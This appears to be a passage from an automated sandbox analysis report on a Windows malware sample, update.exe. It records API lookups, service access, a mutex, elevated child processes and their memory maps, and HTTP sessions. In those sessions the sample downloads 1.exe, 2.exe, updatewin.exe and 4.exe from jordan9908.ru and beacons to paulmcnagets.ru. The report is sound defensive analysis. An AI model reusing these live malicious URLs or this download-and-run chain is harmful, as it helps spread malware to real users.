Get Address	c:\windows\syswow64\kernel32.dll	function = IsProcessorFeaturePresent, address_out = 0x75a35235	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = PostQuitMessage, address_out = 0x75709abb	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = LoadCursorW, address_out = 0x757088f7	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = BeginPaint, address_out = 0x75711361	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = TranslateMessage, address_out = 0x75707809	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = RegisterClassExW, address_out = 0x7570b17d	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = ShowWindow, address_out = 0x75710dfb	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = IsWindow, address_out = 0x75707136	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = CreateWindowExW, address_out = 0x75708a29	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = UpdateWindow, address_out = 0x75713559	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = DefWindowProcW, address_out = 0x778825dd	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = PeekMessageW, address_out = 0x757105ba	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = PostThreadMessageW, address_out = 0x75708bff	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = MessageBoxW, address_out = 0x7575fd3f	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = DispatchMessageW, address_out = 0x7570787b	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = DestroyWindow, address_out = 0x75709a55	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = EndPaint, address_out = 0x75711341	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = SendMessageW, address_out = 0x75709679	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = GetMessageW, address_out = 0x757078e2	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CloseServiceHandle, address_out = 0x75b4369c	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CryptAcquireContextW, address_out = 0x75b3df14	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = GetUserNameW, address_out = 0x75b4157a	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CryptHashData, address_out = 0x75b3df36	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = RegSetValueExW, address_out = 0x75b414d6	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = RegCloseKey, address_out = 0x75b4469d	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CryptDestroyHash, address_out = 0x75b3df66	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = OpenSCManagerW, address_out = 0x75b3ca64	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = OpenServiceW, address_out = 0x75b3ca4c	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = ControlService, address_out = 0x75b57144	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = RegOpenKeyExW, address_out = 0x75b4468d	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CryptCreateHash, address_out = 0x75b3df4e	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = QueryServiceStatus, address_out = 0x75b42a86	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = RegQueryValueExW, address_out = 0x75b446ad	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CryptReleaseContext, address_out = 0x75b3e124	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = CryptGetHashParam, address_out = 0x75b3df7e	1	Fn
Get Address	c:\windows\syswow64\shell32.dll	function = SHGetPathFromIDListW, address_out = 0x767017bf	1	Fn
Get Address	c:\windows\syswow64\shell32.dll	function = SHGetSpecialFolderLocation, address_out = 0x766fe141	1	Fn
Get Address	c:\windows\syswow64\shell32.dll	function = CommandLineToArgvW, address_out = 0x76689ee8	1	Fn
Get Address	c:\windows\syswow64\shell32.dll	function = ShellExecuteA, address_out = 0x768b7078	1	Fn
Get Address	c:\windows\syswow64\shell32.dll	function = ShellExecuteExW, address_out = 0x76691e46	1	Fn
Get Address	c:\windows\syswow64\ole32.dll	function = CoInitialize, address_out = 0x7555b636	1	Fn
Get Address	c:\windows\syswow64\ole32.dll	function = CoInitializeSecurity, address_out = 0x75567259	1	Fn
Get Address	c:\windows\syswow64\ole32.dll	function = CoUninitialize, address_out = 0x755886d3	1	Fn
Get Address	c:\windows\syswow64\ole32.dll	function = CoCreateInstance, address_out = 0x75589d0b	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = 202, address_out = 0x75f6fd6b	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = 2, address_out = 0x75f64642	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = 9, address_out = 0x75f63eae	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = 8, address_out = 0x75f63ed5	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = 6, address_out = 0x75f63e59	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = 200, address_out = 0x75f63f21	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = 12, address_out = 0x75f65dee	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = 201, address_out = 0x75f64af8	1	Fn
Get Address	c:\windows\syswow64\iphlpapi.dll	function = GetAdaptersInfo, address_out = 0x75279263	1	Fn
Get Address	c:\windows\syswow64\ws2_32.dll	function = 12, address_out = 0x764cb131	1	Fn
Get Address	c:\windows\syswow64\ws2_32.dll	function = 11, address_out = 0x764c311b	1	Fn
Get Address	c:\windows\syswow64\ws2_32.dll	function = 52, address_out = 0x764d7673	1	Fn
Get Address	c:\windows\syswow64\dnsapi.dll	function = DnsFree, address_out = 0x751a436b	1	Fn
Get Address	c:\windows\syswow64\dnsapi.dll	function = DnsQuery_W, address_out = 0x751b572c	1	Fn
Get Address	c:\windows\syswow64\msvcr100.dll	function = atexit, address_out = 0x750fc544	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = InitializeCriticalSectionEx, address_out = 0x75a34d28	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateEventExW, address_out = 0x75ab410b	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateSemaphoreExW, address_out = 0x75ab4195	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetThreadStackGuarantee, address_out = 0x75a3d31f	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateThreadpoolTimer, address_out = 0x75a4ee7e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetThreadpoolTimer, address_out = 0x7789441c	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = WaitForThreadpoolTimerCallbacks, address_out = 0x778bc50e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CloseThreadpoolTimer, address_out = 0x778bc381	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateThreadpoolWait, address_out = 0x75a4f088	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetThreadpoolWait, address_out = 0x778a05d7	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CloseThreadpoolWait, address_out = 0x778bca24	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FlushProcessWriteBuffers, address_out = 0x77870b8c	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FreeLibraryWhenCallbackReturns, address_out = 0x7792fde8	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetCurrentProcessorNumber, address_out = 0x778c1e1d	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetLogicalProcessorInformation, address_out = 0x75ab4761	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateSymbolicLinkW, address_out = 0x75aacd11	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetDefaultDllDirectories, address_out = 0x0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = EnumSystemLocalesEx, address_out = 0x75ab424f	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CompareStringEx, address_out = 0x75ab46b1	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetDateFormatEx, address_out = 0x75ac6676	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetLocaleInfoEx, address_out = 0x75ab4751	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetTimeFormatEx, address_out = 0x75ac65f1	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetUserDefaultLocaleName, address_out = 0x75ab47c1	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = IsValidLocaleName, address_out = 0x75ab47e1	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = LCMapStringEx, address_out = 0x75ab47f1	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetCurrentPackageId, address_out = 0x0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetTickCount64, address_out = 0x75a4eee0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetFileInformationByHandleExW, address_out = 0x0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetFileInformationByHandleW, address_out = 0x0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = EnumProcesses, address_out = 0x0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = EnumProcessModules, address_out = 0x0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetModuleBaseNameW, address_out = 0x0	1	Fn
Get Address	c:\windows\syswow64\psapi.dll	function = EnumProcesses, address_out = 0x76421544	1	Fn
Get Address	c:\windows\syswow64\psapi.dll	function = EnumProcessModules, address_out = 0x76421408	1	Fn
Get Address	c:\windows\syswow64\psapi.dll	function = GetModuleBaseNameW, address_out = 0x7642152c	1	Fn
Get Address	c:\windows\syswow64\shell32.dll	function = SHGetFolderPathA, address_out = 0x76787804	1	Fn

Service (2)

Operation	Additional Information	Success	Count	Logfile
Open	database_name = SERVICES_ACTIVE_DATABASE		1	Fn
Open Manager	database_name = SERVICES_ACTIVE_DATABASE		1	Fn

Window (1)

Operation	Window Name	Additional Information	Success	Count	Logfile
Create	LPCWSTRszTitle	class_name = LPCWSTRszWindowClass, wndproc_parameter = 0		1	Fn

System (103)

Operation	Additional Information	Count	Logfile
Sleep	duration = 1 milliseconds (0.001 seconds)	98	Fn
Sleep	duration = 180000 milliseconds (180.000 seconds)	1	Fn
Get Time	type = System Time, time = 2018-11-19 13:56:03 (UTC)	1	Fn
Get Time	type = Ticks, time = 97360	1	Fn
Get Time	type = System Time, time = 2018-11-19 13:56:04 (UTC)	1	Fn
Get Info	type = Operating System	1	Fn

Mutex (1)

Operation	Additional Information	Success	Count	Logfile
Create	mutex_name = {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}		1	Fn

Environment (2)

Operation	Additional Information	Success	Count	Logfile
Get Environment String	-		2	Fn Data

Network Behavior

HTTP Sessions (5)

Information	Value
Total Data Sent	1.00 KB
Total Data Received	3.75 MB
Contacted Host Count	2
Contacted Hosts	jordan9908.ru, paulmcnagets.ru

HTTP Session #1

Information	Value
User Agent	Microsoft Internet Explorer
Server Name	jordan9908.ru
Server Port	80
Data Sent	194
Data Received	184836

Operation	Additional Information	Count	Logfile
Open Session	user_agent = Microsoft Internet Explorer, access_type = INTERNET_OPEN_TYPE_PRECONFIG	1	Fn
Open Connection	protocol = http, server_name = jordan9908.ru, server_port = 80	1	Fn
Open HTTP Request	http_verb = GET, http_version = HTTP 1.1, target_resource = /1.exe	1	Fn
Send HTTP Request	headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = http://jordan9908.ru/1.exe	1	Fn
Query HTTP Info	flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4	1	Fn Data
Read Response	size = 10240, size_out = 10240	18	Fn Data
Read Response	size = 10240, size_out = 512	1	Fn Data
Close Session	-	3	Fn

HTTP Session #2

Information	Value
User Agent	Microsoft Internet Explorer
Server Name	paulmcnagets.ru
Server Port	80
Data Sent	241
Data Received	107

Operation	Additional Information	Count	Logfile
Open Session	user_agent = Microsoft Internet Explorer, access_type = INTERNET_OPEN_TYPE_PRECONFIG	1	Fn
Open Connection	protocol = http, server_name = paulmcnagets.ru, server_port = 80	1	Fn
Open HTTP Request	http_verb = GET, http_version = HTTP 1.1, target_resource = /003/get.php	1	Fn
Send HTTP Request	headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = http://paulmcnagets.ru/003/get.php?pid=33E9AA5ADDB65D39A5923495F06BCF33	1	Fn
Read Response	size = 1024, size_out = 103	1	Fn Data
Query HTTP Info	flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4	1	Fn Data
Close Session	-	1	Fn

HTTP Session #3

Information	Value
User Agent	Microsoft Internet Explorer
Server Name	jordan9908.ru
Server Port	80
Data Sent	194
Data Received	186372

Operation	Additional Information	Count	Logfile
Open Session	user_agent = Microsoft Internet Explorer, access_type = INTERNET_OPEN_TYPE_PRECONFIG	1	Fn
Open Connection	protocol = http, server_name = jordan9908.ru, server_port = 80	1	Fn
Open HTTP Request	http_verb = GET, http_version = HTTP 1.1, target_resource = /2.exe	1	Fn
Send HTTP Request	headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = http://jordan9908.ru/2.exe	1	Fn
Query HTTP Info	flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4	1	Fn Data
Read Response	size = 10240, size_out = 10240	18	Fn Data
Read Response	size = 10240, size_out = 2048	1	Fn Data
Close Session	-	3	Fn

HTTP Session #4

Information	Value
User Agent	Microsoft Internet Explorer
Server Name	jordan9908.ru
Server Port	80
Data Sent	202
Data Received	131076

Operation	Additional Information	Count	Logfile
Open Session	user_agent = Microsoft Internet Explorer, access_type = INTERNET_OPEN_TYPE_PRECONFIG	1	Fn
Open Connection	protocol = http, server_name = jordan9908.ru, server_port = 80	1	Fn
Open HTTP Request	http_verb = GET, http_version = HTTP 1.1, target_resource = /updatewin.exe	1	Fn
Send HTTP Request	headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = http://jordan9908.ru/updatewin.exe	1	Fn
Query HTTP Info	flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4	1	Fn Data
Read Response	size = 10240, size_out = 10240	12	Fn Data
Read Response	size = 10240, size_out = 8192	1	Fn Data
Close Session	-	3	Fn

HTTP Session #5

Information	Value
User Agent	Microsoft Internet Explorer
Server Name	jordan9908.ru
Server Port	80
Data Sent	194
Data Received	3430404

Operation	Additional Information	Count	Logfile
Open Session	user_agent = Microsoft Internet Explorer, access_type = INTERNET_OPEN_TYPE_PRECONFIG	1	Fn
Open Connection	protocol = http, server_name = jordan9908.ru, server_port = 80	1	Fn
Open HTTP Request	http_verb = GET, http_version = HTTP 1.1, target_resource = /4.exe	1	Fn
Send HTTP Request	headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = http://jordan9908.ru/4.exe	1	Fn
Query HTTP Info	flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4	1	Fn Data
Read Response	size = 10240, size_out = 10240	335	Fn Data
Read Response	size = 10240	1	Fn

Process #6: update.exe

Information	Value
ID	#6
File Name	c:\users\5p5nrgjn0js halpmcxz\desktop\update.exe
Command Line	"C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\update.exe" --ForNetRes 5sQa7p3KFH0h1EIQpNMDhhbQdqopHt59HIaPvsLC LsCOYLRYMkqjvfiCCakqofPJhgWeL5nBT09BhA40 IsNotAutoStart IsNotTask
Initial Working Directory	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\
Monitor	Start Time: 00:00:58, Reason: Child Process
Unmonitor	End Time: 00:01:03, Reason: Self Terminated
Monitor Duration	00:00:05
Remark	No high level activity detected in monitored regions

OS Process Information

Information	Value
PID	0x9b4
Parent PID	0x904 (c:\users\5p5nrgjn0js halpmcxz\desktop\update.exe)
Is Created or Modified Executable
Integrity Level	High (Elevated)
Username	XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges	SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs	0x 9B8 0x A78

Region

Name	Start VA	End VA	Type	Permissions	Actions
private_0x0000000000010000	0x00010000	0x0002ffff	Private Memory	rw	-
pagefile_0x0000000000010000	0x00010000	0x0001ffff	Pagefile Backed Memory	rw	-
private_0x0000000000030000	0x00030000	0x00031fff	Private Memory	rw	-
private_0x0000000000030000	0x00030000	0x0003ffff	Private Memory	rw	-
apisetschema.dll	0x00040000	0x00040fff	Memory Mapped File	rwx	-
private_0x0000000000050000	0x00050000	0x0008ffff	Private Memory	rw	-
private_0x0000000000090000	0x00090000	0x0018ffff	Private Memory	rw	-
pagefile_0x0000000000190000	0x00190000	0x00193fff	Pagefile Backed Memory	r	-
private_0x00000000001a0000	0x001a0000	0x001dffff	Private Memory	rw	-
private_0x00000000001e0000	0x001e0000	0x002dffff	Private Memory	rw	-
locale.nls	0x002e0000	0x00346fff	Memory Mapped File	r	-
update.exe	0x00400000	0x0049afff	Memory Mapped File	rwx	... Region Actions Download Dump
private_0x00000000005e0000	0x005e0000	0x0065ffff	Private Memory	rw	-
private_0x00000000007a0000	0x007a0000	0x0089ffff	Private Memory	rw	-
pagefile_0x00000000008a0000	0x008a0000	0x00a27fff	Pagefile Backed Memory	r	-
wow64cpu.dll	0x74d90000	0x74d97fff	Memory Mapped File	rwx	-
wow64win.dll	0x74da0000	0x74dfbfff	Memory Mapped File	rwx	-
wow64.dll	0x74e00000	0x74e3efff	Memory Mapped File	rwx	-
msimg32.dll	0x75280000	0x75284fff	Memory Mapped File	rwx	-
cryptbase.dll	0x753a0000	0x753abfff	Memory Mapped File	rwx	-
sspicli.dll	0x753b0000	0x7540ffff	Memory Mapped File	rwx	-
usp10.dll	0x75410000	0x754acfff	Memory Mapped File	rwx	-
user32.dll	0x756f0000	0x757effff	Memory Mapped File	rwx	-
kernel32.dll	0x75a20000	0x75b2ffff	Memory Mapped File	rwx	-
advapi32.dll	0x75b30000	0x75bcffff	Memory Mapped File	rwx	-
msctf.dll	0x75d40000	0x75e0bfff	Memory Mapped File	rwx	-
msvcrt.dll	0x75e30000	0x75edbfff	Memory Mapped File	rwx	-
sechost.dll	0x762b0000	0x762c8fff	Memory Mapped File	rwx	-
lpk.dll	0x762d0000	0x762d9fff	Memory Mapped File	rwx	-
imm32.dll	0x76500000	0x7655ffff	Memory Mapped File	rwx	-
kernelbase.dll	0x765f0000	0x76635fff	Memory Mapped File	rwx	-
rpcrt4.dll	0x772d0000	0x773bffff	Memory Mapped File	rwx	-
gdi32.dll	0x773c0000	0x7744ffff	Memory Mapped File	rwx	-
private_0x0000000077450000	0x77450000	0x77549fff	Private Memory	rwx	-
private_0x0000000077550000	0x77550000	0x7766efff	Private Memory	rwx	-
ntdll.dll	0x77670000	0x77818fff	Memory Mapped File	rwx	-
ntdll.dll	0x77850000	0x779cffff	Memory Mapped File	rwx	-
private_0x000000007efe0000	0x7efe0000	0x7ffdffff	Private Memory	r	-
pagefile_0x000000007efe0000	0x7efe0000	0x7f0dffff	Pagefile Backed Memory	r	-
private_0x000000007f0e0000	0x7f0e0000	0x7ffdffff	Private Memory	r	-
private_0x000000007ffe0000	0x7ffe0000	0x7ffeffff	Private Memory	r	-
pagefile_0x00000000fffb0000	0xfffb0000	0xfffd2fff	Pagefile Backed Memory	r	-
private_0x00000000fffd8000	0xfffd8000	0xfffdafff	Private Memory	rw	-
private_0x00000000fffdb000	0xfffdb000	0xfffddfff	Private Memory	rw	-
private_0x00000000fffde000	0xfffde000	0xfffdefff	Private Memory	rw	-
private_0x00000000fffdf000	0xfffdf000	0xfffdffff	Private Memory	rw	-
private_0x00000000fffe0000	0xfffe0000	0x7fffffeffff	Private Memory	r	-

Process #7: update.exe

Information	Value
ID	#7
File Name	c:\users\5p5nrgjn0js halpmcxz\desktop\update.exe
Command Line	"C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\update.exe" --Service 2308 5sQa7p3KFH0h1EIQpNMDhhbQdqopHt59HIaPvsLC LsCOYLRYMkqjvfiCCakqofPJhgWeL5nBT09BhA40
Initial Working Directory	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\
Monitor	Start Time: 00:00:58, Reason: Child Process
Unmonitor	End Time: 00:01:03, Reason: Self Terminated
Monitor Duration	00:00:05
Remark	No high level activity detected in monitored regions

OS Process Information

Information	Value
PID	0x9bc
Parent PID	0x904 (c:\users\5p5nrgjn0js halpmcxz\desktop\update.exe)
Is Created or Modified Executable
Integrity Level	High (Elevated)
Username	XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges	SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs	0x A70 0x 9C0

Region

Name	Start VA	End VA	Type	Permissions	Actions
private_0x0000000000010000	0x00010000	0x0002ffff	Private Memory	rw	-
pagefile_0x0000000000010000	0x00010000	0x0001ffff	Pagefile Backed Memory	rw	-
private_0x0000000000030000	0x00030000	0x00031fff	Private Memory	rw	-
apisetschema.dll	0x00040000	0x00040fff	Memory Mapped File	rwx	-
private_0x0000000000050000	0x00050000	0x0008ffff	Private Memory	rw	-
private_0x0000000000090000	0x00090000	0x0018ffff	Private Memory	rw	-
pagefile_0x0000000000190000	0x00190000	0x00193fff	Pagefile Backed Memory	r	-
private_0x00000000001a0000	0x001a0000	0x001dffff	Private Memory	rw	-
private_0x00000000001e0000	0x001e0000	0x002dffff	Private Memory	rw	-
locale.nls	0x002e0000	0x00346fff	Memory Mapped File	r	-
private_0x0000000000350000	0x00350000	0x003cffff	Private Memory	rw	-
private_0x00000000003f0000	0x003f0000	0x003fffff	Private Memory	rw	-
update.exe	0x00400000	0x0049afff	Memory Mapped File	rwx	... Region Actions Download Dump
private_0x0000000000510000	0x00510000	0x0060ffff	Private Memory	rw	-
pagefile_0x0000000000610000	0x00610000	0x00797fff	Pagefile Backed Memory	r	-
wow64cpu.dll	0x74d90000	0x74d97fff	Memory Mapped File	rwx	-
wow64win.dll	0x74da0000	0x74dfbfff	Memory Mapped File	rwx	-
wow64.dll	0x74e00000	0x74e3efff	Memory Mapped File	rwx	-
msimg32.dll	0x75290000	0x75294fff	Memory Mapped File	rwx	-
cryptbase.dll	0x753a0000	0x753abfff	Memory Mapped File	rwx	-
sspicli.dll	0x753b0000	0x7540ffff	Memory Mapped File	rwx	-
usp10.dll	0x75410000	0x754acfff	Memory Mapped File	rwx	-
user32.dll	0x756f0000	0x757effff	Memory Mapped File	rwx	-
kernel32.dll	0x75a20000	0x75b2ffff	Memory Mapped File	rwx	-
advapi32.dll	0x75b30000	0x75bcffff	Memory Mapped File	rwx	-
msctf.dll	0x75d40000	0x75e0bfff	Memory Mapped File	rwx	-
msvcrt.dll	0x75e30000	0x75edbfff	Memory Mapped File	rwx	-
sechost.dll	0x762b0000	0x762c8fff	Memory Mapped File	rwx	-
lpk.dll	0x762d0000	0x762d9fff	Memory Mapped File	rwx	-
imm32.dll	0x76500000	0x7655ffff	Memory Mapped File	rwx	-
kernelbase.dll	0x765f0000	0x76635fff	Memory Mapped File	rwx	-
rpcrt4.dll	0x772d0000	0x773bffff	Memory Mapped File	rwx	-
gdi32.dll	0x773c0000	0x7744ffff	Memory Mapped File	rwx	-
private_0x0000000077450000	0x77450000	0x77549fff	Private Memory	rwx	-
private_0x0000000077550000	0x77550000	0x7766efff	Private Memory	rwx	-
ntdll.dll	0x77670000	0x77818fff	Memory Mapped File	rwx	-
ntdll.dll	0x77850000	0x779cffff	Memory Mapped File	rwx	-
private_0x000000007efe0000	0x7efe0000	0x7ffdffff	Private Memory	r	-
pagefile_0x000000007efe0000	0x7efe0000	0x7f0dffff	Pagefile Backed Memory	r	-
private_0x000000007f0e0000	0x7f0e0000	0x7ffdffff	Private Memory	r	-
private_0x000000007ffe0000	0x7ffe0000	0x7ffeffff	Private Memory	r	-
pagefile_0x00000000fffb0000	0xfffb0000	0xfffd2fff	Pagefile Backed Memory	r	-
private_0x00000000fffd8000	0xfffd8000	0xfffdafff	Private Memory	rw	-
private_0x00000000fffdb000	0xfffdb000	0xfffddfff	Private Memory	rw	-
private_0x00000000fffde000	0xfffde000	0xfffdefff	Private Memory	rw	-
private_0x00000000fffdf000	0xfffdf000	0xfffdffff	Private Memory	rw	-
private_0x00000000fffe0000	0xfffe0000	0x7fffffeffff	Private Memory	r	-

Process #8: 1.exe

Information	Value
ID	#8
File Name	c:\users\5p5nrgjn0js halpmcxz\appdata\local\ac0fced0-d42a-4728-a9f2-bdfd4590c238\1.exe
Command Line	"C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\ac0fced0-d42a-4728-a9f2-bdfd4590c238\1.exe"
Initial Working Directory	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\
Monitor	Start Time: 00:00:59, Reason: Child Process
Unmonitor	End Time: 00:01:00, Reason: Self Terminated
Monitor Duration	00:00:01

OS Process Information

Information	Value
PID	0x9cc
Parent PID	0x904 (c:\users\5p5nrgjn0js halpmcxz\desktop\update.exe)
Is Created or Modified Executable
Integrity Level	High (Elevated)
Username	XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges	SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs	0x 9D0 0x 9D8 0x 9DC 0x 9E0 0x 9E4

Region

Name	Start VA	End VA	Type	Permissions	Actions
private_0x0000000000010000	0x00010000	0x0002ffff	Private Memory	rw	-
pagefile_0x0000000000010000	0x00010000	0x0001ffff	Pagefile Backed Memory	rw	-
private_0x0000000000020000	0x00020000	0x00020fff	Private Memory	rw	-
private_0x0000000000030000	0x00030000	0x00031fff	Private Memory	rw	-
private_0x0000000000030000	0x00030000	0x00030fff	Private Memory	rw	-
apisetschema.dll	0x00040000	0x00040fff	Memory Mapped File	rwx	-
pagefile_0x0000000000050000	0x00050000	0x00053fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000060000	0x00060000	0x00060fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000070000	0x00070000	0x00070fff	Pagefile Backed Memory	rw	-
pagefile_0x0000000000080000	0x00080000	0x00081fff	Pagefile Backed Memory	r	-
private_0x0000000000090000	0x00090000	0x000cffff	Private Memory	rw	-
locale.nls	0x000d0000	0x00136fff	Memory Mapped File	r	-
pagefile_0x0000000000140000	0x00140000	0x00140fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000150000	0x00150000	0x00151fff	Pagefile Backed Memory	r	-
private_0x0000000000160000	0x00160000	0x0019ffff	Private Memory	rw	-
pagefile_0x00000000001a0000	0x001a0000	0x001a0fff	Pagefile Backed Memory	r	-
cversions.2.db	0x001b0000	0x001b3fff	Memory Mapped File	r	-
{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000016.db	0x001c0000	0x001defff	Memory Mapped File	r	-
pagefile_0x00000000001e0000	0x001e0000	0x001e0fff	Pagefile Backed Memory	rw	-
cversions.2.db	0x001f0000	0x001f3fff	Memory Mapped File	r	-
pagefile_0x0000000000200000	0x00200000	0x00206fff	Pagefile Backed Memory	r	-
private_0x0000000000210000	0x00210000	0x0024ffff	Private Memory	rw	-
{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000012.db	0x00250000	0x0027ffff	Memory Mapped File	r	-
pagefile_0x0000000000280000	0x00280000	0x00281fff	Pagefile Backed Memory	rw	-
private_0x0000000000290000	0x00290000	0x0038ffff	Private Memory	rw	-
1.exe	0x003a0000	0x003d1fff	Memory Mapped File	rwx	... Region Actions Download Dump
pagefile_0x00000000003e0000	0x003e0000	0x004befff	Pagefile Backed Memory	r	-
{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db	0x004c0000	0x00525fff	Memory Mapped File	r	-
private_0x0000000000560000	0x00560000	0x0056ffff	Private Memory	rw	-
private_0x0000000000590000	0x00590000	0x0060ffff	Private Memory	rw	-
pagefile_0x0000000000610000	0x00610000	0x00797fff	Pagefile Backed Memory	r	-
private_0x00000000007c0000	0x007c0000	0x008bffff	Private Memory	rw	-
pagefile_0x00000000008c0000	0x008c0000	0x00a40fff	Pagefile Backed Memory	r	-
pagefile_0x0000000000a50000	0x00a50000	0x01e4ffff	Pagefile Backed Memory	r	-
sortdefault.nls	0x01e50000	0x0211efff	Memory Mapped File	r	-
private_0x0000000002170000	0x02170000	0x0226ffff	Private Memory	rw	-
private_0x00000000022f0000	0x022f0000	0x0232ffff	Private Memory	rw	-
private_0x0000000002350000	0x02350000	0x0238ffff	Private Memory	rw	-
private_0x00000000023f0000	0x023f0000	0x024effff	Private Memory	rw	-
pagefile_0x00000000024f0000	0x024f0000	0x028e2fff	Pagefile Backed Memory	r	-
private_0x0000000002910000	0x02910000	0x0294ffff	Private Memory	rw	-
private_0x0000000002990000	0x02990000	0x02a8ffff	Private Memory	rw	-
private_0x0000000002a90000	0x02a90000	0x02b8ffff	Private Memory	rw	-
shdocvw.dll	0x74940000	0x7496dfff	Memory Mapped File	rwx	-
apphelp.dll	0x749a0000	0x749ebfff	Memory Mapped File	rwx	-
propsys.dll	0x749f0000	0x74ae4fff	Memory Mapped File	rwx	-
uxtheme.dll	0x74d00000	0x74d7ffff	Memory Mapped File	rwx	-
wow64cpu.dll	0x74d90000	0x74d97fff	Memory Mapped File	rwx	-
